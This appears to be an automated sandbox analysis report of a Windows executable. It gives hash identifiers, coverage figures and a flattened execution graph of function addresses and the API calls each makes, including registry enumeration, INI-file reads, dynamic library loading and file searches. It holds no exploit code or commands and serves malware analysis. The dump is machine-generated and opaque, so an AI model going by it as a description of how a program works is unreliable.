                                                                      • Instruction ID: 298d28553a3f700387dea6c06157f027a7ba74c69b0fe1c0d14b010c740a3b55
                                                                      • Opcode Fuzzy Hash: a9fb2844ceaa9879afdc746da54e0e12922ba62d069c0ab92073ae84f79bc1ad
                                                                      • Instruction Fuzzy Hash: 3AE0E532000114BADF116FB2D8068CE3B99EF42364751883BFD08D2043EB3ED511869E

                                                                      Execution Graph

                                                                      Execution Coverage:2.1%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:0.5%
                                                                      Total number of Nodes:762
                                                                      Total number of Limit Nodes:20
                                                                      execution_graph 34006 40fc40 70 API calls 34181 403640 21 API calls 34007 427fa4 42 API calls 34182 412e43 _endthreadex 34183 425115 76 API calls __fprintf_l 34184 43fe40 133 API calls 34010 425115 83 API calls __fprintf_l 34011 401445 memcpy memcpy DialogBoxParamA 34012 440c40 34 API calls 33227 444c4a 33246 444e38 33227->33246 33229 444c56 GetModuleHandleA 33230 444c68 __set_app_type __p__fmode __p__commode 33229->33230 33232 444cfa 33230->33232 33233 444d02 __setusermatherr 33232->33233 33234 444d0e 33232->33234 33233->33234 33247 444e22 _controlfp 33234->33247 33236 444d13 _initterm __getmainargs _initterm 33237 444d6a GetStartupInfoA 33236->33237 33239 444d9e GetModuleHandleA 33237->33239 33248 40cf44 33239->33248 33243 444dcf _cexit 33245 444e04 33243->33245 33244 444dc8 exit 33244->33243 33246->33229 33247->33236 33299 404a99 LoadLibraryA 33248->33299 33250 40cf60 33251 40cf64 33250->33251 33307 410d0e 33250->33307 33251->33243 33251->33244 33253 40cf6f 33311 40ccd7 ??2@YAPAXI 33253->33311 33255 40cf9b 33325 407cbc 33255->33325 33260 40cfc4 33344 409825 memset 33260->33344 33261 40cfd8 33349 4096f4 memset 33261->33349 33266 40d181 ??3@YAXPAX 33268 40d1b3 33266->33268 33269 40d19f DeleteObject 33266->33269 33267 407e30 _strcmpi 33270 40cfee 33267->33270 33373 407948 free free 33268->33373 33269->33268 33272 40cff2 RegDeleteKeyA 33270->33272 33273 40d007 EnumResourceTypesA 33270->33273 33272->33266 33275 40d047 33273->33275 33276 40d02f MessageBoxA 33273->33276 33274 40d1c4 33374 4080d4 free 33274->33374 33278 40d0a0 CoInitialize 33275->33278 33354 40ce70 33275->33354 33276->33266 33371 40cc26 strncat memset RegisterClassA CreateWindowExA 33278->33371 33281 40d1cd 33375 407948 free free 33281->33375 33283 40d0b1 ShowWindow UpdateWindow LoadAcceleratorsA 33372 40c256 PostMessageA 33283->33372 33285 40d061 ??3@YAXPAX 33285->33268 33288 40d084 DeleteObject 33285->33288 33286 40d09e 33286->33278 33288->33268 33291 40d0f9 GetMessageA 33292 40d17b CoUninitialize 33291->33292 33293 40d10d 33291->33293 33292->33266 33294 40d113 TranslateAccelerator 33293->33294 33296 40d145 IsDialogMessage 33293->33296 33297 40d139 IsDialogMessage 33293->33297 33294->33293 33295 40d16d GetMessageA 33294->33295 33295->33292 33295->33294 33296->33295 33298 40d157 TranslateMessage DispatchMessageA 33296->33298 33297->33295 33297->33296 33298->33295 33300 404ac4 GetProcAddress 33299->33300 33301 404aec 33299->33301 33302 404ad4 33300->33302 33303 404add FreeLibrary 33300->33303 33305 404b13 33301->33305 33306 404afc MessageBoxA 33301->33306 33302->33303 33303->33301 33304 404ae8 33303->33304 33304->33301 33305->33250 33306->33250 33308 410d17 LoadLibraryA 33307->33308 33309 410d3c 33307->33309 33308->33309 33310 410d2b GetProcAddress 33308->33310 33309->33253 33310->33309 33312 40cd08 ??2@YAPAXI 33311->33312 33314 40cd26 33312->33314 33316 40cd2d 33312->33316 33383 404025 6 API calls 33314->33383 33317 40cd66 33316->33317 33318 40cd59 DeleteObject 33316->33318 33376 407088 33317->33376 33318->33317 33320 40cd6b 33379 4019b5 33320->33379 33323 4019b5 strncat 33324 40cdbf _mbscpy 33323->33324 33324->33255 33385 407948 free free 33325->33385 33327 407e04 33386 407a55 33327->33386 33330 407a1f malloc memcpy free free 33332 407cf7 33330->33332 33331 407ddc 33331->33327 33391 407a1f 33331->33391 33332->33327 33332->33330 33332->33331 33334 407d83 33332->33334 33335 407d7a free 33332->33335 33389 40796e 7 API calls 33332->33389 33334->33332 33390 406f30 malloc memcpy free 33334->33390 33335->33332 33340 407e30 33342 407e38 33340->33342 33343 407e57 33340->33343 33341 407e41 _strcmpi 33341->33342 33341->33343 33342->33341 33342->33343 33343->33260 33343->33261 33399 4097ff 33344->33399 33346 409854 33404 409731 33346->33404 33350 4097ff 3 API calls 33349->33350 33351 409723 33350->33351 33424 40966c 33351->33424 33438 4023b2 33354->33438 33360 40ced3 33522 40cdda 7 API calls 33360->33522 33361 40cece 33364 40cf3f 33361->33364 33475 40c3d0 memset GetModuleFileNameA strrchr 33361->33475 33364->33285 33364->33286 33367 40ceed 33501 40affa 33367->33501 33371->33283 33372->33291 33373->33274 33374->33281 33375->33251 33384 406fc7 memset _mbscpy 33376->33384 33378 40709f CreateFontIndirectA 33378->33320 33380 4019e1 33379->33380 33381 4019c2 strncat 33380->33381 33382 4019e5 memset LoadIconA 33380->33382 33381->33380 33382->33323 33383->33316 33384->33378 33385->33332 33387 407a65 33386->33387 33388 407a5b free 33386->33388 33387->33340 33388->33387 33389->33332 33390->33334 33392 407a38 33391->33392 33393 407a2d free 33391->33393 33398 406f30 malloc memcpy free 33392->33398 33396 407a44 33393->33396 33395 407a43 33395->33396 33397 40796e 7 API calls 33396->33397 33397->33327 33398->33395 33415 406f96 GetModuleFileNameA 33399->33415 33401 409805 strrchr 33402 409814 33401->33402 33403 409817 _mbscat 33401->33403 33402->33403 33403->33346 33416 44b090 33404->33416 33409 40930c 3 API calls 33410 409779 EnumResourceNamesA EnumResourceNamesA _mbscpy memset 33409->33410 33411 4097c5 LoadStringA 33410->33411 33412 4097db 33411->33412 33412->33411 33413 4097f3 33412->33413 33423 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33412->33423 33413->33266 33415->33401 33417 40973e _mbscpy _mbscpy 33416->33417 33418 40930c 33417->33418 33419 44b090 33418->33419 33420 409319 memset GetPrivateProfileStringA 33419->33420 33421 409374 33420->33421 33422 409364 WritePrivateProfileStringA 33420->33422 33421->33409 33422->33421 33423->33412 33434 406f81 GetFileAttributesA 33424->33434 33426 409675 33427 4096ee 33426->33427 33428 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33426->33428 33427->33267 33435 409278 GetPrivateProfileStringA 33428->33435 33430 4096c9 33436 409278 GetPrivateProfileStringA 33430->33436 33432 4096da 33437 409278 GetPrivateProfileStringA 33432->33437 33434->33426 33435->33430 33436->33432 33437->33427 33524 409c1c 33438->33524 33441 401e69 memset 33563 410dbb 33441->33563 33444 401ec2 33587 4070e3 strlen _mbscat _mbscpy _mbscat 33444->33587 33445 401ed4 33576 406f81 GetFileAttributesA 33445->33576 33448 401ee6 strlen strlen 33450 401f15 33448->33450 33451 401f28 33448->33451 33588 4070e3 strlen _mbscat _mbscpy _mbscat 33450->33588 33577 406f81 GetFileAttributesA 33451->33577 33454 401f35 33578 401c31 33454->33578 33457 401f75 33459 402165 33457->33459 33460 401f9c memset 33457->33460 33458 401c31 5 API calls 33458->33457 33462 402195 ExpandEnvironmentStringsA 33459->33462 33463 4021a8 _strcmpi 33459->33463 33589 410b62 RegEnumKeyExA 33460->33589 33595 406f81 GetFileAttributesA 33462->33595 33463->33360 33463->33361 33465 401fd9 atoi 33466 401fef memset memset sprintf 33465->33466 33472 401fc9 33465->33472 33590 410b1e 33466->33590 33469 402076 memset memset strlen strlen 33469->33472 33470 4070e3 strlen _mbscat _mbscpy _mbscat 33470->33472 33471 4020dd strlen strlen 33471->33472 33472->33459 33472->33465 33472->33469 33472->33470 33472->33471 33473 406f81 GetFileAttributesA 33472->33473 33474 402167 _mbscpy 33472->33474 33594 410b62 RegEnumKeyExA 33472->33594 33473->33472 33474->33459 33476 40c422 33475->33476 33477 40c425 _mbscat _mbscpy _mbscpy 33475->33477 33476->33477 33478 40c49d 33477->33478 33479 40c512 33478->33479 33480 40c502 GetWindowPlacement 33478->33480 33481 40c538 33479->33481 33613 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33479->33613 33480->33479 33606 409b31 33481->33606 33485 40ba28 33486 40ba87 33485->33486 33492 40ba3c 33485->33492 33616 406c62 LoadCursorA SetCursor 33486->33616 33488 40ba8c 33617 403c16 33488->33617 33683 404734 33488->33683 33691 404785 33488->33691 33694 4107f1 33488->33694 33489 40ba43 _mbsicmp 33489->33492 33490 40baa0 33491 407e30 _strcmpi 33490->33491 33495 40bab0 33491->33495 33492->33486 33492->33489 33697 40b5e5 10 API calls 33492->33697 33493 40bafa SetCursor 33493->33367 33495->33493 33496 40baf1 qsort 33495->33496 33496->33493 33990 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33501->33990 33503 40b00e 33504 40b016 33503->33504 33505 40b01f GetStdHandle 33503->33505 33991 406d1a CreateFileA 33504->33991 33507 40b01c 33505->33507 33508 40b035 33507->33508 33509 40b12d 33507->33509 33992 406c62 LoadCursorA SetCursor 33508->33992 33996 406d77 9 API calls 33509->33996 33512 40b136 33523 40c580 28 API calls 33512->33523 33513 40b042 33514 40b087 33513->33514 33520 40b0a1 33513->33520 33993 40a57c strlen WriteFile 33513->33993 33514->33520 33994 40a699 12 API calls 33514->33994 33517 40b0d6 33518 40b116 CloseHandle 33517->33518 33519 40b11f SetCursor 33517->33519 33518->33519 33519->33512 33520->33517 33995 406d77 9 API calls 33520->33995 33522->33361 33523->33364 33536 409a32 33524->33536 33527 409c80 memcpy memcpy 33530 409cda 33527->33530 33528 408db6 12 API calls 33528->33530 33529 409d18 ??2@YAPAXI ??2@YAPAXI 33531 409d54 ??2@YAPAXI 33529->33531 33534 409d8b 33529->33534 33530->33527 33530->33528 33530->33529 33531->33534 33546 409b9c 33534->33546 33535 4023c1 33535->33441 33537 409a44 33536->33537 33538 409a3d ??3@YAXPAX 33536->33538 33539 409a52 33537->33539 33540 409a4b ??3@YAXPAX 33537->33540 33538->33537 33541 409a63 33539->33541 33542 409a5c ??3@YAXPAX 33539->33542 33540->33539 33543 409a83 ??2@YAPAXI ??2@YAPAXI 33541->33543 33544 409a73 ??3@YAXPAX 33541->33544 33545 409a7c ??3@YAXPAX 33541->33545 33542->33541 33543->33527 33544->33545 33545->33543 33547 407a55 free 33546->33547 33548 409ba5 33547->33548 33549 407a55 free 33548->33549 33550 409bad 33549->33550 33551 407a55 free 33550->33551 33552 409bb5 33551->33552 33553 407a55 free 33552->33553 33554 409bbd 33553->33554 33555 407a1f 4 API calls 33554->33555 33556 409bd0 33555->33556 33557 407a1f 4 API calls 33556->33557 33558 409bda 33557->33558 33559 407a1f 4 API calls 33558->33559 33560 409be4 33559->33560 33561 407a1f 4 API calls 33560->33561 33562 409bee 33561->33562 33562->33535 33564 410d0e 2 API calls 33563->33564 33565 410dca 33564->33565 33566 410dfd memset 33565->33566 33596 4070ae 33565->33596 33569 410e1d 33566->33569 33570 410e7f _mbscpy 33569->33570 33599 410d3d _mbscpy 33569->33599 33571 401e9e strlen strlen 33570->33571 33571->33444 33571->33445 33573 410e5b 33600 410add RegQueryValueExA 33573->33600 33575 410e73 33575->33570 33576->33448 33577->33454 33579 401c4c 33578->33579 33586 401ca1 33579->33586 33601 410add RegQueryValueExA 33579->33601 33581 401c6a 33582 401c71 strchr 33581->33582 33581->33586 33583 401c85 strchr 33582->33583 33582->33586 33584 401c94 33583->33584 33583->33586 33602 406f06 strlen 33584->33602 33586->33457 33586->33458 33587->33445 33588->33451 33589->33472 33591 410b34 33590->33591 33592 410b4c 33591->33592 33605 410add RegQueryValueExA 33591->33605 33592->33472 33594->33472 33595->33463 33597 4070bd GetVersionExA 33596->33597 33598 4070ce 33596->33598 33597->33598 33598->33566 33598->33571 33599->33573 33600->33575 33601->33581 33603 406f17 33602->33603 33604 406f1a memcpy 33602->33604 33603->33604 33604->33586 33605->33592 33607 409b40 33606->33607 33609 409b4e 33606->33609 33614 409901 memset SendMessageA 33607->33614 33610 409b99 33609->33610 33611 409b8b 33609->33611 33610->33485 33615 409868 SendMessageA 33611->33615 33613->33481 33614->33609 33615->33610 33616->33488 33618 4107f1 FreeLibrary 33617->33618 33619 403c30 LoadLibraryA 33618->33619 33620 403c74 33619->33620 33621 403c44 GetProcAddress 33619->33621 33623 4107f1 FreeLibrary 33620->33623 33621->33620 33622 403c5e 33621->33622 33622->33620 33627 403c6b 33622->33627 33624 403c7b 33623->33624 33625 404734 3 API calls 33624->33625 33626 403c86 33625->33626 33698 4036e5 33626->33698 33627->33624 33630 4036e5 27 API calls 33631 403c9a 33630->33631 33632 4036e5 27 API calls 33631->33632 33633 403ca4 33632->33633 33634 4036e5 27 API calls 33633->33634 33635 403cae 33634->33635 33710 4085d2 33635->33710 33641 403cd2 33643 403cf7 33641->33643 33862 402bd1 37 API calls 33641->33862 33644 403d1c 33643->33644 33863 402bd1 37 API calls 33643->33863 33745 402c5d 33644->33745 33648 4070ae GetVersionExA 33649 403d31 33648->33649 33651 403d61 33649->33651 33864 402b22 42 API calls 33649->33864 33653 403d97 33651->33653 33865 402b22 42 API calls 33651->33865 33654 403dcd 33653->33654 33866 402b22 42 API calls 33653->33866 33757 410808 33654->33757 33658 404785 FreeLibrary 33659 403de8 33658->33659 33761 402fdb 33659->33761 33662 402fdb 29 API calls 33663 403e00 33662->33663 33773 4032b7 33663->33773 33672 403e3b 33674 403e73 33672->33674 33675 403e46 _mbscpy 33672->33675 33820 40fb00 33674->33820 33868 40f334 333 API calls 33675->33868 33684 404785 FreeLibrary 33683->33684 33685 40473b LoadLibraryA 33684->33685 33686 40474c GetProcAddress 33685->33686 33687 40476e 33685->33687 33686->33687 33688 404764 33686->33688 33689 404781 33687->33689 33690 404785 FreeLibrary 33687->33690 33688->33687 33689->33490 33690->33689 33692 4047a3 33691->33692 33693 404799 FreeLibrary 33691->33693 33692->33490 33693->33692 33695 410807 33694->33695 33696 4107fc FreeLibrary 33694->33696 33695->33490 33696->33695 33697->33492 33699 4037c5 33698->33699 33700 4036fb 33698->33700 33699->33630 33869 410863 UuidFromStringA UuidFromStringA memcpy CoTaskMemFree 33700->33869 33702 40370e 33702->33699 33703 403716 strchr 33702->33703 33703->33699 33704 403730 33703->33704 33870 4021b6 memset 33704->33870 33706 40373f _mbscpy _mbscpy strlen 33707 4037a4 _mbscpy 33706->33707 33708 403789 sprintf 33706->33708 33871 4023e5 16 API calls 33707->33871 33708->33707 33711 4085e2 33710->33711 33872 4082cd 11 API calls 33711->33872 33713 4085ec 33714 403cba 33713->33714 33715 40860b memset 33713->33715 33722 40821d 33714->33722 33874 410b62 RegEnumKeyExA 33715->33874 33717 408637 33717->33714 33718 40865c memset 33717->33718 33876 40848b 10 API calls 33717->33876 33877 410b62 RegEnumKeyExA 33717->33877 33875 410add RegQueryValueExA 33718->33875 33723 40823f 33722->33723 33724 403cc6 33723->33724 33725 408246 memset 33723->33725 33730 4086e0 33724->33730 33878 410b62 RegEnumKeyExA 33725->33878 33727 40826f 33727->33724 33879 4080ed 11 API calls 33727->33879 33880 410b62 RegEnumKeyExA 33727->33880 33881 4045db 33730->33881 33732 4088ef 33889 404656 33732->33889 33736 408737 wcslen 33736->33732 33742 40876a 33736->33742 33737 40877a wcsncmp 33737->33742 33739 404734 3 API calls 33739->33742 33740 404785 FreeLibrary 33740->33742 33741 408812 memset 33741->33742 33743 40883c memcpy wcschr 33741->33743 33742->33732 33742->33737 33742->33739 33742->33740 33742->33741 33742->33743 33744 4088c3 LocalFree 33742->33744 33892 40466b _mbscpy 33742->33892 33743->33742 33744->33742 33746 402c7a 33745->33746 33747 402d9a 33746->33747 33748 402c87 memset 33746->33748 33747->33648 33893 410b62 RegEnumKeyExA 33748->33893 33750 410b1e RegQueryValueExA 33751 402ce4 memset sprintf 33750->33751 33754 402cb2 33751->33754 33752 402d3a sprintf 33752->33754 33754->33747 33754->33750 33754->33752 33894 402bd1 37 API calls 33754->33894 33895 402bd1 37 API calls 33754->33895 33896 410b62 RegEnumKeyExA 33754->33896 33758 410816 33757->33758 33759 4107f1 FreeLibrary 33758->33759 33760 403ddd 33759->33760 33760->33658 33762 402ff9 33761->33762 33763 403006 memset 33762->33763 33764 403122 33762->33764 33897 410b62 RegEnumKeyExA 33763->33897 33764->33662 33766 410b1e RegQueryValueExA 33767 403058 memset sprintf 33766->33767 33771 403033 33767->33771 33768 4030a2 memset 33898 410b62 RegEnumKeyExA 33768->33898 33771->33764 33771->33766 33771->33768 33772 410b62 RegEnumKeyExA 33771->33772 33899 402db3 24 API calls 33771->33899 33772->33771 33774 4032d5 33773->33774 33775 4033a9 33773->33775 33900 4021b6 memset 33774->33900 33788 4034e4 memset memset 33775->33788 33777 4032e1 33901 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33777->33901 33779 4032ea 33780 4032f8 memset GetPrivateProfileSectionA 33779->33780 33902 4023e5 16 API calls 33779->33902 33780->33775 33785 40332f 33780->33785 33782 40339b strlen 33782->33775 33782->33785 33784 403350 strchr 33784->33785 33785->33775 33785->33782 33903 4021b6 memset 33785->33903 33904 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33785->33904 33905 4023e5 16 API calls 33785->33905 33789 410b1e RegQueryValueExA 33788->33789 33790 40353f 33789->33790 33791 40357f 33790->33791 33792 403546 _mbscpy 33790->33792 33796 403985 33791->33796 33906 406d55 strlen _mbscat 33792->33906 33794 403565 _mbscat 33907 4033f0 19 API calls 33794->33907 33908 40466b _mbscpy 33796->33908 33800 4039aa 33802 4039ff 33800->33802 33909 40f6e2 33800->33909 33925 40f460 12 API calls 33800->33925 33926 4038e8 21 API calls 33800->33926 33803 404785 FreeLibrary 33802->33803 33804 403a0b 33803->33804 33805 4037ca memset memset 33804->33805 33928 444551 memset 33805->33928 33808 4038e2 33808->33672 33867 40f334 333 API calls 33808->33867 33810 40382e 33811 406f06 2 API calls 33810->33811 33812 403843 33811->33812 33813 406f06 2 API calls 33812->33813 33814 403855 strchr 33813->33814 33815 403884 _mbscpy 33814->33815 33816 403897 strlen 33814->33816 33817 4038bf _mbscpy 33815->33817 33816->33817 33818 4038a4 sprintf 33816->33818 33937 4023e5 16 API calls 33817->33937 33818->33817 33822 40fb10 33820->33822 33821 403e7f 33830 40f96c 33821->33830 33822->33821 33823 40fb55 RegQueryValueExA 33822->33823 33823->33821 33824 40fb84 33823->33824 33825 404734 3 API calls 33824->33825 33826 40fb91 33825->33826 33826->33821 33827 40fc19 LocalFree 33826->33827 33828 40fbdd memcpy memcpy 33826->33828 33827->33821 33941 40f802 7 API calls 33828->33941 33831 4070ae GetVersionExA 33830->33831 33832 40f98d 33831->33832 33833 4045db 7 API calls 33832->33833 33837 40f9a9 33833->33837 33834 40fae6 33835 404656 FreeLibrary 33834->33835 33836 403e85 33835->33836 33842 4442ea memset 33836->33842 33837->33834 33838 40fa13 memset WideCharToMultiByte 33837->33838 33838->33837 33839 40fa43 _strnicmp 33838->33839 33839->33837 33840 40fa5b WideCharToMultiByte 33839->33840 33840->33837 33841 40fa88 WideCharToMultiByte 33840->33841 33841->33837 33843 410dbb 7 API calls 33842->33843 33844 444329 33843->33844 33942 40759e strlen strlen 33844->33942 33849 410dbb 7 API calls 33850 444350 33849->33850 33851 40759e 3 API calls 33850->33851 33852 44435a 33851->33852 33853 444212 64 API calls 33852->33853 33854 444366 memset memset 33853->33854 33855 410b1e RegQueryValueExA 33854->33855 33856 4443b9 ExpandEnvironmentStringsA strlen 33855->33856 33857 4443f4 _strcmpi 33856->33857 33858 4443e5 33856->33858 33859 403e91 33857->33859 33860 44440c 33857->33860 33858->33857 33859->33490 33861 444212 64 API calls 33860->33861 33861->33859 33862->33643 33863->33644 33864->33651 33865->33653 33866->33654 33867->33672 33868->33674 33869->33702 33870->33706 33871->33699 33873 40841c 33872->33873 33873->33713 33874->33717 33875->33717 33876->33717 33877->33717 33878->33727 33879->33727 33880->33727 33882 404656 FreeLibrary 33881->33882 33883 4045e3 LoadLibraryA 33882->33883 33884 404651 33883->33884 33885 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33883->33885 33884->33732 33884->33736 33886 40463d 33885->33886 33887 404643 33886->33887 33888 404656 FreeLibrary 33886->33888 33887->33884 33888->33884 33890 404666 33889->33890 33891 40465c FreeLibrary 33889->33891 33890->33641 33891->33890 33892->33742 33893->33754 33894->33752 33895->33754 33896->33754 33897->33771 33898->33771 33899->33771 33900->33777 33901->33779 33902->33780 33903->33784 33904->33785 33905->33785 33906->33794 33907->33791 33908->33800 33927 40466b _mbscpy 33909->33927 33911 40f6fa 33912 4045db 7 API calls 33911->33912 33913 40f708 33912->33913 33915 404734 3 API calls 33913->33915 33919 40f7e2 33913->33919 33914 404656 FreeLibrary 33916 40f7f1 33914->33916 33920 40f715 33915->33920 33917 404785 FreeLibrary 33916->33917 33918 40f7fc 33917->33918 33918->33800 33919->33914 33920->33919 33921 40f797 WideCharToMultiByte 33920->33921 33922 40f7b8 strlen 33921->33922 33923 40f7d9 LocalFree 33921->33923 33922->33923 33924 40f7c8 _mbscpy 33922->33924 33923->33919 33924->33923 33925->33800 33926->33800 33927->33911 33929 44458b 33928->33929 33930 40381a 33929->33930 33938 410add RegQueryValueExA 33929->33938 33930->33808 33936 4021b6 memset 33930->33936 33932 4445a4 33932->33930 33939 410add RegQueryValueExA 33932->33939 33934 4445c1 33934->33930 33940 444879 30 API calls 33934->33940 33936->33810 33937->33808 33938->33932 33939->33934 33940->33930 33941->33827 33943 4075c9 33942->33943 33944 4075bb _mbscat 33942->33944 33945 444212 33943->33945 33944->33943 33962 407e9d 33945->33962 33948 44424d 33949 444274 33948->33949 33950 444258 33948->33950 33970 407ef8 33948->33970 33951 407e9d 9 API calls 33949->33951 33987 444196 51 API calls 33950->33987 33958 4442a0 33951->33958 33953 407ef8 9 API calls 33953->33958 33954 4442ce 33984 407f90 33954->33984 33958->33953 33958->33954 33960 444212 64 API calls 33958->33960 33980 407e62 33958->33980 33959 407f90 FindClose 33961 4442e4 33959->33961 33960->33958 33961->33849 33963 407f90 FindClose 33962->33963 33964 407eaa 33963->33964 33965 406f06 2 API calls 33964->33965 33966 407ebd strlen strlen 33965->33966 33967 407ee1 33966->33967 33968 407eea 33966->33968 33988 4070e3 strlen _mbscat _mbscpy _mbscat 33967->33988 33968->33948 33971 407f03 FindFirstFileA 33970->33971 33972 407f24 FindNextFileA 33970->33972 33973 407f3f 33971->33973 33974 407f46 strlen strlen 33972->33974 33975 407f3a 33972->33975 33973->33974 33979 407f7f 33973->33979 33977 407f76 33974->33977 33974->33979 33976 407f90 FindClose 33975->33976 33976->33973 33989 4070e3 strlen _mbscat _mbscpy _mbscat 33977->33989 33979->33948 33981 407e94 33980->33981 33982 407e6c strcmp 33980->33982 33981->33958 33982->33981 33983 407e83 strcmp 33982->33983 33983->33981 33985 407fa3 33984->33985 33986 407f99 FindClose 33984->33986 33985->33959 33986->33985 33987->33948 33988->33968 33989->33979 33990->33503 33991->33507 33992->33513 33993->33514 33994->33520 33995->33517 33996->33512 34014 411853 RtlInitializeCriticalSection memset 34015 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 34190 40a256 13 API calls 34192 432e5b 17 API calls 34194 43fa5a 20 API calls 34017 401060 41 API calls 34197 427260 CloseHandle memset memset 34021 410c68 FindResourceA SizeofResource LoadResource LockResource 34199 405e69 14 API calls 34023 433068 15 API calls __fprintf_l 34201 414a6d 18 API calls 34202 43fe6f 134 API calls 34025 424c6d 15 API calls __fprintf_l 34203 426741 19 API calls 34027 440c70 17 API calls 34028 443c71 42 API calls 34031 427c79 24 API calls 34206 416e7e memset __fprintf_l 34035 42800b 47 API calls 34036 425115 85 API calls __fprintf_l 34209 41960c 61 API calls 34037 43f40c 122 API calls __fprintf_l 34040 411814 InterlockedCompareExchange RtlDeleteCriticalSection 34041 43f81a 20 API calls 34043 414c20 memset memset 34044 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34213 414625 18 API calls 34214 404225 modf 34215 403a26 strlen WriteFile 34217 40422a 12 API calls 34221 427632 memset memset memcpy 34222 40ca30 59 API calls 34223 404235 26 API calls 34045 42ec34 61 API calls __fprintf_l 34046 425115 76 API calls __fprintf_l 34224 425115 77 API calls __fprintf_l 34226 44223a 38 API calls 34052 43183c 112 API calls 34227 44b2c5 _onexit __dllonexit 34232 42a6d2 memcpy __allrem 34054 405cda 60 API calls 34240 43fedc 138 API calls 34241 4116e1 16 API calls __fprintf_l 34057 4244e6 19 API calls 34059 42e8e8 127 API calls __fprintf_l 34060 4118ee RtlLeaveCriticalSection 34246 43f6ec 22 API calls 34062 425115 119 API calls __fprintf_l 34063 410cf3 EnumResourceNamesA 34249 4492f0 memcpy memcpy 34251 43fafa 18 API calls 34253 4342f9 15 API calls __fprintf_l 34064 4144fd 19 API calls 34255 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34256 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34259 443a84 _mbscpy 34261 43f681 17 API calls 34067 404487 22 API calls 34263 415e8c 16 API calls __fprintf_l 34071 411893 RtlDeleteCriticalSection __fprintf_l 34072 41a492 42 API calls 34267 403e96 34 API calls 34268 410e98 memset SHGetPathFromIDList SendMessageA 34074 426741 109 API calls __fprintf_l 34075 4344a2 18 API calls 34076 4094a2 10 API calls 34271 4116a6 15 API calls __fprintf_l 34272 43f6a4 17 API calls 34273 440aa3 20 API calls 34275 427430 45 API calls 34079 4090b0 7 API calls 34080 4148b0 15 API calls 34082 4118b4 RtlEnterCriticalSection 34083 4014b7 CreateWindowExA 34084 40c8b8 19 API calls 34086 4118bf RtlTryEnterCriticalSection 34280 42434a 18 API calls __fprintf_l 34282 405f53 12 API calls 34094 43f956 59 API calls 34096 40955a 17 API calls 34097 428561 36 API calls 34098 409164 7 API calls 34286 404366 19 API calls 34290 40176c ExitProcess 34293 410777 42 API calls 34103 40dd7b 51 API calls 34104 425d7c 16 API calls __fprintf_l 34295 43f6f0 25 API calls 34296 42db01 22 API calls 34105 412905 15 API calls __fprintf_l 34297 403b04 54 API calls 34298 405f04 SetDlgItemTextA GetDlgItemTextA 34299 44b301 ??3@YAXPAX 34302 4120ea 14 API calls 3 library calls 34303 40bb0a 8 API calls 34305 413f11 strcmp 34109 434110 17 API calls __fprintf_l 34112 425115 108 API calls __fprintf_l 34306 444b11 _onexit 34114 425115 76 API calls __fprintf_l 34117 429d19 10 API calls 34309 444b1f __dllonexit 34310 409f20 _strcmpi 34119 42b927 31 API calls 34313 433f26 19 API calls __fprintf_l 34314 44b323 FreeLibrary 34315 427f25 46 API calls 34316 43ff2b 17 API calls 34317 43fb30 19 API calls 34126 414d36 16 API calls 34128 40ad38 7 API calls 34319 433b38 16 API calls __fprintf_l 33997 44b33b 33998 44b344 ??3@YAXPAX 33997->33998 33999 44b34b 33997->33999 33998->33999 34000 44b354 ??3@YAXPAX 33999->34000 34001 44b35b 33999->34001 34000->34001 34002 44b364 ??3@YAXPAX 34001->34002 34003 44b36b 34001->34003 34002->34003 34004 44b374 ??3@YAXPAX 34003->34004 34005 44b37b 34003->34005 34004->34005 34132 426741 21 API calls 34133 40c5c3 123 API calls 34135 43fdc5 17 API calls 34320 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 34138 4161cb memcpy memcpy memcpy memcpy 34325 43ffc8 18 API calls 34139 4281cc 15 API calls __fprintf_l 34327 4383cc 110 API calls __fprintf_l 34140 4275d3 41 API calls 34328 4153d3 22 API calls __fprintf_l 34141 444dd7 _XcptFilter 34333 4013de 15 API calls 34335 425115 111 API calls __fprintf_l 34336 43f7db 18 API calls 34339 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 34143 4335ee 16 API calls __fprintf_l 34341 429fef 11 API calls 34144 444deb _exit _c_exit 34342 40bbf0 133 API calls 34147 425115 79 API calls __fprintf_l 34346 437ffa 22 API calls 34151 4021ff 14 API calls 34152 43f5fc 149 API calls 34347 40e381 9 API calls 34154 405983 40 API calls 34155 42b186 27 API calls __fprintf_l 34156 427d86 76 API calls 34157 403585 20 API calls 34159 42e58e 18 API calls __fprintf_l 34162 425115 75 API calls __fprintf_l 34164 401592 8 API calls 33200 410b92 33203 410a6b 33200->33203 33202 410bb2 33204 410a77 33203->33204 33205 410a89 GetPrivateProfileIntA 33203->33205 33208 410983 memset _itoa WritePrivateProfileStringA 33204->33208 33205->33202 33207 410a84 33207->33202 33208->33207 34351 434395 16 API calls 34166 441d9c memcmp 34353 43f79b 119 API calls 34167 40c599 42 API calls 34354 426741 87 API calls 34171 4401a6 21 API calls 34173 426da6 memcpy memset memset memcpy 34174 4335a5 15 API calls 34176 4299ab memset memset memcpy memset memset 34177 40b1ab 8 API calls 34359 425115 76 API calls __fprintf_l 34363 4113b2 18 API calls 2 library calls 34367 40a3b8 memset sprintf SendMessageA 33209 410bbc 33212 4109cf 33209->33212 33213 4109dc 33212->33213 33214 410a23 memset GetPrivateProfileStringA 33213->33214 33215 4109ea memset 33213->33215 33220 407646 strlen 33214->33220 33225 4075cd sprintf memcpy 33215->33225 33218 410a65 33219 410a0c WritePrivateProfileStringA 33219->33218 33221 40765a 33220->33221 33223 40765c 33220->33223 33221->33218 33222 4076a3 33222->33218 33223->33222 33226 40737c strtoul 33223->33226 33225->33219 33226->33223 34179 40b5bf memset memset _mbsicmp

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
